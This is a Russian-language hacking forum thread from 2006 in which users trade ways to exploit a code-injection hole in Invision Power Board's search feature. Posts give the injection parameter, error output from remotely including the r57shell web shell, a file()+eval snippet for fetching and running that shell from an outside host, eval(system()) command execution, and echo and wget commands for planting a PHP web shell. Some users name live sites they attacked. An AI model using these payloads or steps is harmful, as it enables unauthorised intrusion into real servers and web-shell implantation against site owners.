HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 01.05.2006, 18:06
Sanyk36
Новичок
Регистрация: 20.04.2006
Сообщений: 5
Провел на форуме:
108775

Репутация: 0
По умолчанию

Добавил &lastdate=z|eval.*?%20//)%23e%00 и появилась вверху такая надпись:
Код:
IPB WARNING [2] include() [function.include]: URL file-access is disabled in the server configuration (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include(http://rst.void.ru/download/r57shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include() [function.include]: Failed opening 'http://rst.void.ru/download/r57shell.txt' for inclusion (include_path='.:/opt/php/lib/php:/home/users/e/evsu/incs') (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
На локалке всё прошло на ура, а вот уже в инете так.
 

  #82  
Старый 01.05.2006, 18:31
xdye
Познающий
Регистрация: 03.04.2006
Сообщений: 31
Провел на форуме:
175806

Репутация: 14
По умолчанию

Да сейчас много где это идет на ура (мега респект автару) но то что мне действительно нодо не кактит...
 

  #83  
Старый 01.05.2006, 18:51
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Цитата:
Там не дает просто белая страничка, еще одно Otaku пишет то на сниффер придёт
а если у меня нет снифера куда тогда оно предет? ) ладно если будет минутка помогите
разабратся) спосибо
Аффтар ты!!!
Например вот неплохой сниффер ресурс:
http://s.netsec.ru/
 

  #84  
Старый 01.05.2006, 18:59
gimlis
Новичок
Регистрация: 25.01.2006
Сообщений: 8
Провел на форуме:
76510

Репутация: 2
По умолчанию

Цитата:
Сообщение от Sanyk36  
Добавил &lastdate=z|eval.*?%20//)%23e%00 и появилась вверху такая надпись:
Код:
IPB WARNING [2] include() [function.include]: URL file-access is disabled in the server configuration (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include(http://rst.void.ru/download/r57shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include() [function.include]: Failed opening 'http://rst.void.ru/download/r57shell.txt' for inclusion (include_path='.:/opt/php/lib/php:/home/users/e/evsu/incs') (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
На локалке всё прошло на ура, а вот уже в инете так.
Запрещено использование include попробуйте с помощью php фаила, приложенного в архиве закодить что-нибудь наподобии.
$file=join("",file("http://rst.void.ru/download/r57shell.txt"));
eval($file);
и его заслать
 

  #85  
Старый 02.05.2006, 10:49
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Обсуждение скульника тут http://forum.antichat.ru/thread18495.html
XSS тут http://forum.antichat.ru/thread17358.html
__________________
Full DNS report
 

  #86  
Старый 02.05.2006, 15:53
L1on
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629

Репутация: 2
По умолчанию

Цитата:
Сообщение от Go0o$E  
Очень даже хорошо работает exploit! Проверил на lineageii.ru.
Не знаю почему, но на форуме lineageii.ru, у меня не выполняются никакие команды, ни под винду, ни под линукс. Хотя тема создаётся... Если делаю ручками, то тож не пашет.
Кстати часто на форумах сплойт не воспроизводит команды, а ручками всё работает. Может это из-за того что я не правил сплойт...

И ещё: когда я постю сообщение, например
Код:
eval(system(ls)); //'
то при поиске выдаёт файлы, лежащие на сервере, а когда например:
Код:
eval(system(ls -la)); //'
то мне выдаётся:
IPB WARNING [2] system(): Cannot execute a blank command (Line: 1 of /sources/search.php(1236) : regexp code)

Почему так?

Последний раз редактировалось L1on; 02.05.2006 в 16:06..
 

  #87  
Старый 02.05.2006, 15:59
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Они уже пропатчили форум.
 

  #88  
Старый 02.05.2006, 16:46
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

я нашол форум ломаемы.... но он на винде... там пашет dir, md и т.д.
как можно закачать шелл или скачать сонфиг... бо не получаеться! =(
 

  #89  
Старый 02.05.2006, 17:39
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Цитата:
Сообщение от Grema  
я нашол форум ломаемы.... но он на винде... там пашет dir, md и т.д.
как можно закачать шелл или скачать сонфиг... бо не получаеться! =(
Шелл примерно так. Узнай путь и напиши выполни.

echo "<? include($xxx); ?>" > c:\xxx2.txt

причем файл создаться с ковычками, но они не должны повлиять на код.

Или как показано в http://video.antichat.ru/file196.html через ФТП команды.

а линуксовская команда CAT равнозначна мелкомягкой TYPE
(type c:\xxx2.txt)
 

  #90  
Старый 02.05.2006, 18:16
4lex
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме:
13209

Репутация: 0
По умолчанию

а если сервак на linux, echo ведь прокатит?

вот такой код

echo "<? system($_GET['c']) ?> " > ./shell.php

запишет в shell.php строку с system? а то у меня не получается.
и еще как то странно себя ведет wget я делаю cd ./uploads/; wget _http://serv/shell.php;

вроде бы записывает в файл, файл появляеться. но когда его запускаю, он показывает файлы с моего сервера... что делать?

Последний раз редактировалось 4lex; 02.05.2006 в 18:44..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 19 18.11.2006 09:19
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Эксплоит для Invision Power Board v2.1.3? xdx Уязвимости CMS / форумов 8 08.02.2006 22:56
Invision Power Board <= 1.3.1 Login.PHP SQL Injection Как пользоваться? GrisS Уязвимости CMS / форумов 16 02.02.2006 16:00
Вопрос про заливку шелла в Invision Power Board DiNo Уязвимости CMS / форумов 14 03.03.2005 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ